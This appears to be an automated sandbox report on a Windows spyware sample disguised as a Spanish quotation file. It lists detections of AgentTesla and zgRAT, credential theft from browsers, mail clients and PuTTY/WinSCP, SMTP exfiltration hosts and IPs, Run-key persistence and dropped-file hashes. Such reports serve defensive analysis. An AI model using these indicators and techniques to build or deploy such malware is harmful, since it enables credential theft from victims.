                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70afb7f8.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec708cb750.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70624338.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec7091b788.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70624338.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec708cb750.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70afb7f8.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.532200083.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.530714621.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.530884956.000000000316C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Hxpqwdnjsynypvjkzfile.exe PID: 3896, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 5992, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                11
                Registry Run Keys / Startup Folder
                311
                Process Injection
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                Account Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts11
                Registry Run Keys / Startup Folder
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                1
                File and Directory Discovery
                Remote Desktop Protocol1
                Data from Local System
                Exfiltration Over Bluetooth11
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information
                1
                Credentials in Registry
                114
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration1
                Non-Standard Port
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Masquerading
                NTDS211
                Security Software Discovery
                Distributed Component Object Model1
                Input Capture
                Scheduled Transfer2
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                Virtualization/Sandbox Evasion
                LSA Secrets1
                Process Discovery
                SSHKeyloggingData Transfer Size Limits23
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common311
                Process Injection
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Hidden Files and Directories
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Owner/User Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                Remote System Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                System Network Configuration Discovery
                Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830792 Sample: cotizaci#U00f3n_y_dise#U00f... Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 42 168.98.4.0.in-addr.arpa 2->42 44 api4.ipify.org 2->44 46 api.ipify.org 2->46 66 Malicious sample detected (through community Yara rule) 2->66 68 Multi AV Scanner detection for submitted file 2->68 70 Yara detected zgRAT 2->70 72 4 other signatures 2->72 8 cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe 1 8 2->8         started        12 KbWSe.exe 7 2->12         started        15 KbWSe.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 34 C:\Users\user\AppData\Local\explorers.exe, PE32+ 8->34 dropped 36 C:\Users\user\...\Hxpqwdnjsynypvjkzfile.exe, PE32 8->36 dropped 38 C:\Users\...\explorers.exe:Zone.Identifier, ASCII 8->38 dropped 40 cotizaci#U00f3n_y_..._de_muestra.exe.log, ASCII 8->40 dropped 82 Encrypted powershell cmdline option found 8->82 84 Creates multiple autostart registry keys 8->84 86 Writes to foreign memory regions 8->86 100 2 other signatures 8->100 19 Hxpqwdnjsynypvjkzfile.exe 17 9 8->19         started        24 powershell.exe 15 8->24         started        26 InstallUtil.exe 8->26         started        54 smtp.thanhphoung-vn.com 12->54 56 104.237.62.211, 443, 49704 WEBNXUS United States 12->56 62 5 other IPs or domains 12->62 88 Antivirus detection for dropped file 12->88 90 Multi AV Scanner detection for dropped file 12->90 92 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->92 102 3 other signatures 12->102 58 smtp.thanhphoung-vn.com 15->58 60 208.91.199.225, 49709, 587 PUBLIC-DOMAIN-REGISTRYUS United States 15->60 64 3 other IPs or domains 15->64 94 Tries to steal Mail credentials (via file / registry access) 15->94 96 Tries to harvest and steal browser information (history, passwords, etc) 15->96 98 Machine Learning detection for dropped file 17->98 28 powershell.exe 17->28         started        file6 signatures7 process8 dnsIp9 48 smtp.thanhphoung-vn.com 19->48 50 api4.ipify.org 173.231.16.76, 443, 49701, 49705 WEBNXUS United States 19->50 52 2 other IPs or domains 19->52 32 C:\Users\user\AppData\Roaming\...\KbWSe.exe, PE32 19->32 dropped 74 Antivirus detection for dropped file 19->74 76 Multi AV Scanner detection for dropped file 19->76 78 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->78 80 7 other signatures 19->80 30 conhost.exe 24->30         started        file10 signatures11 process12

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe26%ReversingLabsWin64.Trojan.Pwsx
                cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe25%VirustotalBrowse
                cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe100%AviraTR/Spy.Gen8
                C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe100%AviraTR/Spy.Gen8
                C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\explorers.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe50%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe62%VirustotalBrowse
                C:\Users\user\AppData\Local\explorers.exe26%ReversingLabsWin64.Trojan.Pwsx
                C:\Users\user\AppData\Local\explorers.exe25%VirustotalBrowse
                C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe50%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe62%VirustotalBrowse
                SourceDetectionScannerLabelLinkDownload
                12.0.Hxpqwdnjsynypvjkzfile.exe.c80000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                13.2.InstallUtil.exe.400000.0.unpack100%AviraHEUR/AGEN.1235860Download File
                SourceDetectionScannerLabelLink
                168.98.4.0.in-addr.arpa0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://urn.to/r/sds_see0%URL Reputationsafe
                http://james.newtonking.com/projects/json0%URL Reputationsafe
                http://smtp.thanhphoung-vn.com0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                us2.smtp.mailhostbox.com
                208.91.199.224
                truefalse
                  high
                  api4.ipify.org
                  173.231.16.76
                  truefalse
                    high
                    168.98.4.0.in-addr.arpa
                    unknown
                    unknowntrueunknown
                    smtp.thanhphoung-vn.com
                    unknown
                    unknowntrue
                      unknown
                      api.ipify.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgHxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.0000000003121000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.newtonsoft.com/jsonexplorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.nuget.org/packages/Newtonsoft.Json.Bsoncotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://smtp.thanhphoung-vn.comHxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.000000000319E000.00000004.00000800.00020000.00000000.sdmp, Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.000000000316C000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002B42000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002AFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://urn.to/r/sds_seecotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.398943660.000001EC78C30000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC70AFB000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC39C21000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.551519357.000001DC422C0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 00000010.00000002.536343238.0000027D2E371000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://us2.smtp.mailhostbox.comHxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.000000000319E000.00000004.00000800.00020000.00000000.sdmp, Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002B42000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.0000000003121000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://james.newtonking.com/projects/jsonexplorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.newtonsoft.com/jsonschemaexplorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      208.91.198.143
                                      unknownUnited States
                                      394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                      104.237.62.211
                                      unknownUnited States
                                      18450WEBNXUSfalse
                                      208.91.199.225
                                      unknownUnited States
                                      394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                      208.91.199.223
                                      unknownUnited States
                                      394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                      208.91.199.224
                                      us2.smtp.mailhostbox.comUnited States
                                      394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                      173.231.16.76
                                      api4.ipify.orgUnited States
                                      18450WEBNXUSfalse
                                      Joe Sandbox Version:37.0.0 Beryl
                                      Analysis ID:830792
                                      Start date and time:2023-03-20 17:38:11 +01:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 12m 56s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:21
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample file name:cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                                      Original Sample Name:cotizacin_y_diseos_de_muestra.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@14/11@19/6
                                      EGA Information:
                                      • Successful, ratio: 66.7%
                                      HDC Information:
                                      • Successful, ratio: 3.1% (good quality ratio 2.5%)
                                      • Quality average: 64.9%
                                      • Quality standard deviation: 35.8%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • TCP Packets have been reduced to 100
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                      • Execution Graph export aborted for target InstallUtil.exe, PID 4664 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      17:39:40API Interceptor34x Sleep call for process: powershell.exe modified
                                      17:39:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorers "C:\Users\user\AppData\Local\explorers.exe"
                                      17:40:03API Interceptor41x Sleep call for process: Hxpqwdnjsynypvjkzfile.exe modified
                                      17:40:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KbWSe C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                      17:40:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorers "C:\Users\user\AppData\Local\explorers.exe"
                                      17:40:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KbWSe C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                      17:40:40API Interceptor92x Sleep call for process: KbWSe.exe modified
                                      No context
                                      No context
                                      No context
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):1822
                                      Entropy (8bit):5.336325892766998
                                      Encrypted:false
                                      SSDEEP:48:MxHKqmHKww+4YHKGD8AoPtHTG1hAHKKPwayHKHK2uTHKIgiqHKl:iq9qBYqGgAoPtzG1eqKPQqqLqIgVql
                                      MD5:85468146CC471012E4D4ABA011818DFF
                                      SHA1:85E2FBF5FF39B0252076FEDB8DB82829EB7C6064
                                      SHA-256:EF85B0C2AE1A545DF1841D8C1892AECD31782FD6E0648822DD681214B53F42FD
                                      SHA-512:F0FAF6000F4F4D5751E132DEE26322603EB7BDE867ECA589268FD9D24D6D84E8382952C2D6A4D8460F425EAF38D121C3FBF2330C94B342DD82089E80DE4857B4
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\773cde8eca09561aeac8ad051c091203\System.Transactions.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.9260988789684415
                                      Encrypted:false
                                      SSDEEP:3:Nlllulb/lj:NllUb/l
                                      MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                      SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                      SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                      SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                      Malicious:false
                                      Preview:@...e................................................@..........
                                      Process:C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):171520
                                      Entropy (8bit):6.183577945077043
                                      Encrypted:false
                                      SSDEEP:3072:VMzcHTOLfqdPUhGArLfCd4PxZGSXN7+WYEJily6yIFHP6tAbVAAr34uNK:VQcTYfqdPUhGArLfCs7G3E6jJpAs4C
                                      MD5:B1DFD2B85A645040D8C89D0FCED4340A
                                      SHA1:B7363F57984D1853255075D6D0C59488A4764EB7
                                      SHA-256:7091EDED4BED4BF6C218D839FF5E3C98A01119311BC9AEDEABFD48502D3D3E62
                                      SHA-512:A139FDD4836C46FFAB5FC5234AD58592F9A3C175D6F0D3B5223A9D9321621B136C3288F2F24ABC12E0669084E88B5D87B4C68D68DFD75AD4D76EFE9460E8349D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      • Antivirus: Virustotal, Detection: 62%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..d..............0.................. ........@.. ....................................@.................................l...O.......F............................................................................ ............... ..H............text....... ...................... ..`.rsrc...F...........................@..@.reloc..............................@..B........................H........................................................................0..I.........+B.....,.(...........,. ....(...........,.(...........,.........,.+.+.*..(....*....0............8.........,*(....~....-........s.........~....o....&.......,.(...........,*(....~....-........s.........~....o....&.......,.sQ................,.~....o_...........,.s^................,.~....oR..........,.~....,+.......,.~....,........,..........,.+.8....*.0..(.........+!.....,.(+..........,........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2820096
                                      Entropy (8bit):5.657091218519326
                                      Encrypted:false
                                      SSDEEP:49152:rkvBmg2iRQHsne0LqnefX5qDRYVKSFzY7RlW:
                                      MD5:38B3D465545A56EA977BA43DCDA97B16
                                      SHA1:E8FC4CB22B0A7E6F24C762B9BD809C8F10A82A84
                                      SHA-256:89B5371841E3EB63F290B60717E55DDFC8518803E14419D5C9AD3A6BF111C2C8
                                      SHA-512:F7966E2904F379FC816CD2326B2AE92D9A92FC28BD59784F64D796486124708CA238134EF0C3BFE892CDEA71AC650B2DB82209DE20378E84544162DCB2774ECC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 26%
                                      • Antivirus: Virustotal, Detection: 25%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...(x.d..........".......*.............. ....@...... .......................@+...........`.......................................................... +.............................................................................................. ..H............text.....*.. ....*................. ..`.rsrc........ +.......*.............@..@........................................H........3...............P....*.........................................v+.+.+.&*s....+.(P...+.(9...+.....(....*..(....*.r...p*..r1..p*...(....*..(....*.~....-.rA..p.....+.+.+......~....*(....+.o....+.s....+..~....*..+......*.+..+.rI..p~....+.t....*(....+.o....+..v+.re..p+......*( ...+.(!...+...V.(......}......}....*..z+.{....+.{....+.*.+..+.("...+..z+.{....+.{....+.*.+..+.("...+..:.(......}....*..0..........+.+....+.(S...+..(.....*.................0..........+e{....,?8_...{....+^8c.
                                      Process:C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):171520
                                      Entropy (8bit):6.183577945077043
                                      Encrypted:false
                                      SSDEEP:3072:VMzcHTOLfqdPUhGArLfCd4PxZGSXN7+WYEJily6yIFHP6tAbVAAr34uNK:VQcTYfqdPUhGArLfCs7G3E6jJpAs4C
                                      MD5:B1DFD2B85A645040D8C89D0FCED4340A
                                      SHA1:B7363F57984D1853255075D6D0C59488A4764EB7
                                      SHA-256:7091EDED4BED4BF6C218D839FF5E3C98A01119311BC9AEDEABFD48502D3D3E62
                                      SHA-512:A139FDD4836C46FFAB5FC5234AD58592F9A3C175D6F0D3B5223A9D9321621B136C3288F2F24ABC12E0669084E88B5D87B4C68D68DFD75AD4D76EFE9460E8349D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      • Antivirus: Virustotal, Detection: 62%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..d..............0.................. ........@.. ....................................@.................................l...O.......F............................................................................ ............... ..H............text....... ...................... ..`.rsrc...F...........................@..@.reloc..............................@..B........................H........................................................................0..I.........+B.....,.(...........,. ....(...........,.(...........,.........,.+.+.*..(....*....0............8.........,*(....~....-........s.........~....o....&.......,.(...........,*(....~....-........s.........~....o....&.......,.sQ................,.~....o_...........,.s^................,.~....oR..........,.~....,+.......,.~....,........,..........,.+.8....*.0..(.........+!.....,.(+..........,........
                                      Process:C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                      Category:dropped
                                      Size (bytes):28672
                                      Entropy (8bit):0.4393511334109407
                                      Encrypted:false
                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                      Category:dropped
                                      Size (bytes):28672
                                      Entropy (8bit):0.4393511334109407
                                      Encrypted:false
